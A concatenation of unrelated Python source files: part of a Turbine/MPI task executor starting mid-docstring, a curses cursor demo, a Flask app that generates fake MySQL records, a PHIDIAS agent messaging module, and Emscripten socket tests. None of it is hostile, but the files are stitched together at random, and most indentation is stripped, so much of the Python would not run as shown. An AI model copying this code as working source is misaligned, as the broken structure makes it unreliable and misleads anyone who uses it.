    Bypass the Swift/T language and run on top of the Turbine engines
in an MPI environment.
Here is a diagram
.. code:: python
| Data | Executor | IPC | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|outgoing_q -|-> Worker_Process
| | | | | | |
Parsl<---Fut-| | | | result exception
^ | | | | | |
| | | Q_mngmnt | | V V
| | | Thread<--|incoming_q<-|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
"""
def __init__(self, label='turbine', storage_access=None, working_dir=None, managed=True):
"""Initialize the thread pool.
Trying to implement the emews model.
"""
logger.debug("Initializing TurbineExecutor")
self.label = label
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
def start(self):
self.mp_manager = mp.Manager()
self.outgoing_q = self.mp_manager.Queue()
self.incoming_q = self.mp_manager.Queue()
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
logger.debug("Created management thread : %s", self._queue_management_thread)
self.worker = mp.Process(target=runner, args=(self.outgoing_q, self.incoming_q))
self.worker.start()
logger.debug("Created worker : %s", self.worker)
self.tasks = {}
self._scaling_enabled = False
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
while True:
logger.debug("[MTHREAD] Management thread active")
try:
msg = self.incoming_q.get(block=True, timeout=1)
except queue.Empty:
# Timed out.
pass
except IOError as e:
logger.debug("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.debug("[MTHREAD] Caught unknown exception: {}".format(e))
else:
if msg is None:
logger.debug("[MTHREAD] Got None")
return
else:
logger.debug("[MTHREAD] Received message: {}".format(msg))
task_fut = self.tasks[msg['task_id']]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
exception, _ = deserialize_object(msg['exception'])
task_fut.set_exception(exception)
if not self.is_alive:
break
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
logging.debug("In _start %s", "*" * 40)
if self._queue_management_thread is None:
logging.debug("Starting management thread ")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
else:
logging.debug("Management thread already exists, returning")
def shutdown(self):
"""Shutdown method, to kill the threads and workers."""
self.is_alive = False
logging.debug("Waking management thread")
self.incoming_q.put(None) # Wake up the thread
self._queue_management_thread.join() # Force join
logging.debug("Exiting thread")
        self.outgoing_q.put(None)  # also signal the worker process (runner) to exit
        self.worker.join()
return True
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method is simply pass through and behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
task_id = uuid.uuid4()
logger.debug("Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
        # Post task to the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of active workers by 1.
        This method is not implemented for this executor and will raise an error if called.
        This would be nice to have, and could be added later.
Raises:
NotImplementedError
"""
raise NotImplementedError
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
This method is not implemented for turbine and will raise an error if called.
Raises:
NotImplementedError
"""
raise NotImplementedError
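# A minimal end-to-end usage sketch (an assumption for illustration; the
# __main__ block below only constructs the executor). start() wires up the
# queues and the worker process, submit() returns a Future, and shutdown()
# tears everything down. The _example_* names are not used elsewhere.
def _example_add(x, y):
    return x + y
def _example_usage():
    executor = TurbineExecutor()
    executor.start()
    try:
        future = executor.submit(_example_add, 40, 2)
        return future.result()  # expected to evaluate to 42
    finally:
        executor.shutdown()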
if __name__ == "__main__":
print("Start")
turb_x = TurbineExecutor()
print("Done")
|
main.py
|
#!/usr/bin/python
import curses
import time
import threading
xpos = 0
ypos = 0
def main_loop(screen):
while 1:
screen.clear()
screen.refresh()
screen.addstr(ypos, xpos, "Hello world\n")
screen.refresh()
time.sleep(0.05)
screen = curses.initscr()
curses.noecho()
curses.curs_set(0)
screen.keypad(1)
thread = threading.Thread(target=main_loop, args=(screen,))
thread.daemon = True
thread.start()
# Key handling loop.
while 1:
event = screen.getch()
if event == ord("q"):
break
if event == ord("w"):
ypos = ypos-1
if event == ord("a"):
xpos = xpos-1
if event == ord("s"):
ypos = ypos+1
if event == ord("d"):
xpos = xpos+1
if xpos<0: xpos=0
if ypos<0: ypos=0
maxy,maxx = screen.getmaxyx()
if xpos>maxx-1: xpos=maxx-1
if ypos>maxy-2: ypos=maxy-2
curses.endwin()
|
app.py
|
from random import randint, choice
from faker import Faker
from time import sleep
from flask import Flask
from multiprocessing import Process, Value
import os
import pymysql
from models import User, Order, init_db
import logging
POSSIBLE_ACTIONS = ("insert_user", "update_user", "insert_order", "delete_user", "delete_order")
app = Flask(__name__)
def random_with_N_digits(n):
range_start = 10**(n-1)
range_end = (10**n)-1
return randint(range_start, range_end)
@app.route('/')
def main():
db_name = os.getenv("MYSQL_DB","demo")
db_user = os.getenv("MYSQL_USER", "root")
db_pass = os.getenv("MYSQL_PASS")
cloud_sql_connection_name = os.environ["CLOUD_SQL_CONNECTION_NAME"]
unix_socket = '/cloudsql/{}'.format(cloud_sql_connection_name)
cnx = pymysql.connect(user=db_user, password=db_pass,
unix_socket=unix_socket, db=db_name)
with cnx.cursor() as cursor:
cursor.execute('SELECT NOW() as now;')
result = cursor.fetchall()
current_time = result[0][0]
cnx.close()
return str(current_time)
def execution_loop():
print('Init db')
init_db()
while True:
action = choice(POSSIBLE_ACTIONS)
print('Action: ' + action) # will not print anything
if action == "insert_user":
insert_user()
elif action == "update_user":
update_user()
elif action == "insert_order":
add_order()
elif action == "delete_user" and choice(POSSIBLE_ACTIONS) == "delete_user":
delete_user()
elif action == "delete_order" and choice(POSSIBLE_ACTIONS) == "delete_order":
delete_order()
sleep(0.5)
def random_gender():
return choice(('m','f','n'))
def insert_user():
faker = Faker()
User(
id=str(random_with_N_digits(9)),
name=faker.name(),
address=faker.address(),
gender=random_gender(),
).create()
def update_user():
user = User.random()
if user is not None:
if choice((True, False)):
user.gender = random_gender()
user.save()
def delete_user():
user = User.random()
if user is not None:
user.delete()
def add_order():
    user = User.random()
    if user is not None:
        Order(
            user_id=user.id,
            product=choice(("Table", "Chair", "Book", "Laptop", "Keyboard"))
        ).create()
def delete_order():
order = Order.random()
if order is not None:
order.delete()
if __name__ == '__main__':
p = Process(target=execution_loop)
p.start()
app.run(host='127.0.0.1', port=8080, debug=True)
p.join()
|
Messaging.py
|
#
#
#
#from __future__ import print_function
import json
import sys
import threading
# Depending on the selected protocol, beliefs will be sent using different functions
send_belief_impl = None
### "http" protocol
if sys.implementation.name == "micropython":
def start_message_server_http(engines, _globals, port):
raise NotImplementedError("'http' protocol is not supported on the micropython platform")
else:
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse
from io import BytesIO
import requests
class PhidiasHTTPServer_RequestHandler(BaseHTTPRequestHandler):
engines = None
_globals = None
port = 0
def do_GET(self):
self.send_response(500)
#self.send_header('Content-type','text/html')
#self.end_headers()
#message = "Hello world!"
#self.wfile.write(bytes(message, "utf8"))
return
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
payload = json.loads(body.decode())
# payload = { 'from' : source,
# 'to': agent_name,
# 'data' : ['belief', [ belief.name(), belief.string_terms() ] ] }
response = process_incoming_request(
PhidiasHTTPServer_RequestHandler.engines,
PhidiasHTTPServer_RequestHandler._globals,
self.client_address[0],
payload)
body = json.dumps(response)
response = BytesIO()
response.write(body.encode())
self.wfile.write(response.getvalue())
def log_message(self, format, *args):
return
def send_belief_http(agent_name, destination, belief, source):
parsed_url = urlparse("//" + destination)
if parsed_url.hostname is None:
raise InvalidDestinationException()
port = parsed_url.port
if port is None:
port = 6565
payload = { 'from' : source,
'net-port': PhidiasHTTPServer_RequestHandler.port,
'to': agent_name,
'data' : ['belief', [ belief.name(), belief.string_terms() ] ] }
json_payload = json.dumps(payload)
#print(json_payload)
new_url = "http://" + parsed_url.hostname + ":" + str(port)
r = requests.post(new_url, data=json_payload)
reply = json.loads(r.text)
if reply['result'] != "ok":
print("Messaging Error: ", reply)
def server_thread_http(port):
server_address = ('', port)
PhidiasHTTPServer_RequestHandler.port = port
httpd = HTTPServer(server_address, PhidiasHTTPServer_RequestHandler)
print("")
print("\tPHIDIAS Messaging Server is running at port ", port)
print("")
print("")
#print(httpd.socket)
httpd.serve_forever()
def start_message_server_http(engines, _globals, port = 6565):
global send_belief_impl
send_belief_impl = send_belief_http
PhidiasHTTPServer_RequestHandler.engines = engines
PhidiasHTTPServer_RequestHandler._globals = _globals
t = threading.Thread(target = server_thread_http, args = (port, ))
t.daemon = True
t.start()
return t
### "gateway" protocol
class GatewayConnectionSentRequest: # Future-like object
def __init__(self):
self._result = None
self._cond = threading.Condition()
def set_result(self, result):
with self._cond:
self._result = result
self._cond.notify_all()
def result(self):
with self._cond:
while self._result is None:
self._cond.wait()
return self._result
class GatewayConnectionHandler:
def __init__(self, engines, _globals, sock):
self.engines = engines
self._globals = _globals
self.sock = sock
self.lock = threading.Lock()
self.sent_requests_queue = []
def send_belief(self, agent_name, destination, belief, source):
colon_pos = destination.find(":")
if colon_pos < 0:
to_address = destination
to_port = 6565
else:
to_address = destination[:colon_pos]
to_port = int(destination[colon_pos + 1:])
# Prepare payload
payload = { 'from' : source,
'to': agent_name,
'data' : ['belief', [ belief.name(), belief.string_terms() ] ],
'to-address': to_address,
'to-port': to_port }
json_payload = json.dumps(payload).encode('ascii') + b'\n'
#print('PAYLOAD:', payload)
# Send request
req = GatewayConnectionSentRequest()
with self.lock:
self.sent_requests_queue.append(req)
self.sock.sendall(json_payload)
# Wait for result
reply = req.result()
if reply['result'] != "ok":
print("Messaging Error: ", reply)
def server_thread(self):
incoming_buffer = b''
while True:
new_data = self.sock.recv(64)
if len(new_data) == 0:
raise RuntimeError('Lost connection to gateway')
incoming_buffer += new_data
while True:
nl_pos = incoming_buffer.find(b"\n")
if nl_pos < 0:
break # no full message yet, keep on waiting
response_payload = json.loads(incoming_buffer[:nl_pos])
incoming_buffer = incoming_buffer[nl_pos + 1:]
# Process the message
with self.lock:
if 'result' in response_payload: # response to our past request
self.sent_requests_queue.pop(0).set_result(response_payload)
else: # incoming request
from_address = response_payload.pop('from-address')
response = process_incoming_request(self.engines, self._globals, from_address, response_payload)
json_response = json.dumps(response).encode('ascii') + b'\n'
self.sock.sendall(json_response)
def start_message_server_gateway(engines, _globals, gateway_sock):
global send_belief_impl
h = GatewayConnectionHandler(engines, _globals, gateway_sock)
send_belief_impl = h.send_belief
t = threading.Thread(target = h.server_thread)
t.daemon = True
t.start()
return t
### protocol-independent
def process_incoming_request(engines, _globals, from_address, payload):
response = { 'result' : 'err',
'reason' : 'Malformed HTTP payload',
'data' : payload }
if 'from' in payload.keys():
if 'net-port' in payload.keys():
if 'to' in payload.keys():
if 'data' in payload.keys():
# format is valid
_from = payload['from']
_to = payload['to']
_data = payload['data']
_net_port = payload['net-port']
if _net_port == 0:
_from = _from + "@<unknown>"
else:
_from = _from + "@" + from_address + ":" + repr(_net_port)
if _to in engines.keys():
if _data[0] == 'belief':
[ Name, Terms ] = _data[1]
k = _globals[Name]
b = k()
b.make_terms(Terms)
b.source_agent = _from
e = engines[_to]
e.add_belief(b)
response = { 'result' : 'ok' }
else:
response = { 'result' : 'err',
'reason' : 'Invalid verb',
'data' : _data }
else:
response = { 'result' : 'err',
'reason' : 'Destination agent not found',
'data' : _to }
return response
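# A hand-written example of the payload shape accepted by
# process_incoming_request() above (the agent and belief names are made up;
# this constant is illustrative only and is not referenced elsewhere):
EXAMPLE_INCOMING_PAYLOAD = {
    'from': 'sender_agent',
    'net-port': 6565,
    'to': 'receiver_agent',
    'data': ['belief', ['my_belief', ['term1', 'term2']]],
}
# process_incoming_request(engines, _globals, '127.0.0.1', EXAMPLE_INCOMING_PAYLOAD)
# replies {'result': 'ok'} when 'receiver_agent' is a known engine and
# 'my_belief' names a belief class in _globals; otherwise it replies with
# 'err' and a reason such as 'Invalid verb' or 'Destination agent not found'.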
class Messaging:
@classmethod
def local_or_remote(cls, agent_name):
at_pos = agent_name.find("@")
if at_pos < 0:
return (False, None, None)
else:
agent_local_name = agent_name[:at_pos]
site_name = agent_name[at_pos + 1:]
return (True, agent_local_name, site_name)
@classmethod
def send_belief(cls, agent_name, destination, belief, source):
send_belief_impl(agent_name, destination, belief, source)
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
import unittest
from subprocess import Popen, PIPE
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner.py sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from runner import BrowserCore, no_windows, chdir
from tools import shared
from tools.shared import PYTHON, EMCC, NODE_JS, path_from_root, WINDOWS, run_process, JS_ENGINES, CLANG_CC
npm_checked = False
NPM = os.path.join(os.path.dirname(NODE_JS[0]), 'npm.cmd' if WINDOWS else 'npm')
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
        p.kill() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, path_from_root('tests', self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, clang_native.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', path_from_root('tests', self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(NODE_JS + [path_from_root('tests', 'websocket', 'nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, path_from_root('tests', 'websocket', 'tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super(sockets, cls).setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
        self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include] + extra_args)
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
# Run with ./runner.py sockets.test_sockets_async_echo
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = path_from_root('tests', 'sockets', 'test_sockets_echo_client.c')
input = open(input_filename).read()
output = input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message)
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(output, expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], force_c=True)
@no_windows('This test is Unix-specific.')
@unittest.skip('fails on python3 - ws library may need to be updated')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_partial_client.c'), expected='165', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(path_from_root('tests', 'third_party', 'enet'), 'enet')
with chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
for harness in [
CompiledServerHarness(os.path.join('sockets', 'test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
# This test is no longer in use for WebSockets as we can't truly emulate
# a server in the browser (in the past, there were some hacks to make it
# somewhat work, but those have been removed). However, with WebRTC it
  # should be possible to resurrect this test.
# def test_enet_in_browser(self):
# shared.try_delete('enet')
# shutil.copytree(path_from_root('tests', 'enet'), 'enet')
# pwd = os.getcwd()
# os.chdir('enet')
# self.run_process([path_from_root('emconfigure'), './configure'])
# self.run_process([path_from_root('emmake'), 'make'])
# enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
# os.chdir(pwd)
# self.run_process([EMCC, path_from_root('tests', 'sockets', 'test_enet_server.c'), '-o', 'server.html', '-DSOCKK=2235'] + enet)
# def make_relay_server(port1, port2):
# print('creating relay server on ports %d,%d' % (port1, port2), file=sys.stderr)
# proc = self.run_process([PYTHON, path_from_root('tests', 'sockets', 'socket_relay.py'), str(port1), str(port2)])
# return proc
# with WebsockifyServerHarness('', [], 2235, 2234):
# with WebsockifyServerHarness('', [], 2237, 2236):
# pids = []
# try:
# proc = make_relay_server(2234, 2236)
# pids.append(proc.pid)
# self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=['-DSOCKK=2237', '-DUSE_IFRAME=1'] + enet)
# finally:
# clean_pids(pids);
def test_webrtc(self): # XXX see src/settings.js, this is disabled pending investigation
self.skipTest('WebRTC support is not up to date.')
host_src = 'webrtc_host.c'
peer_src = 'webrtc_peer.c'
host_outfile = 'host.html'
peer_outfile = 'peer.html'
host_filepath = path_from_root('tests', 'sockets', host_src)
temp_host_filepath = os.path.join(self.get_dir(), os.path.basename(host_src))
with open(host_filepath) as f:
host_src = f.read()
with open(temp_host_filepath, 'w') as f:
f.write(self.with_report_result(host_src))
peer_filepath = path_from_root('tests', 'sockets', peer_src)
temp_peer_filepath = os.path.join(self.get_dir(), os.path.basename(peer_src))
with open(peer_filepath) as f:
peer_src = f.read()
with open(temp_peer_filepath, 'w') as f:
f.write(self.with_report_result(peer_src))
open(os.path.join(self.get_dir(), 'host_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: undefined,
onpeer: function(peer, route) {
window.open('http://localhost:8888/peer.html?' + route);
// iframe = document.createElement("IFRAME");
// iframe.setAttribute("src", "http://localhost:8888/peer.html?" + route);
// iframe.style.display = "none";
// document.body.appendChild(iframe);
peer.listen();
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
},
onerror: function(error) {
console.error(error);
}
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
open(os.path.join(self.get_dir(), 'peer_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: window.location.toString().split('?')[1],
onpeer: function(peer, route) {
peer.connect(Module['webrtc']['session']);
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
// Calling window.close() from this handler hangs my browser, so run it in the next turn
setTimeout(window.close, 0);
},
onerror: function(error) {
console.error(error);
},
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
self.run_process([EMCC, '-Werror', temp_host_filepath, '-o', host_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'host_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
self.run_process([EMCC, '-Werror', temp_peer_filepath, '-o', peer_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'peer_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
    # note: you may need to run this step manually if npm is not in the path, or if you need a version that is not in the path
self.run_process([NPM, 'install', path_from_root('tests', 'sockets', 'p2p')])
broker = Popen(NODE_JS + [path_from_root('tests', 'sockets', 'p2p', 'broker', 'p2p-broker.js')])
expected = '1'
self.run_browser(host_outfile, '.', ['/report_result?' + e for e in expected])
broker.kill()
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
# Run with ./runner.py sockets.test_nodejs_sockets_echo
if NODE_JS not in JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + path_from_root('tests', 'sockets')
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
self.run_process([EMCC, '-Werror', path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
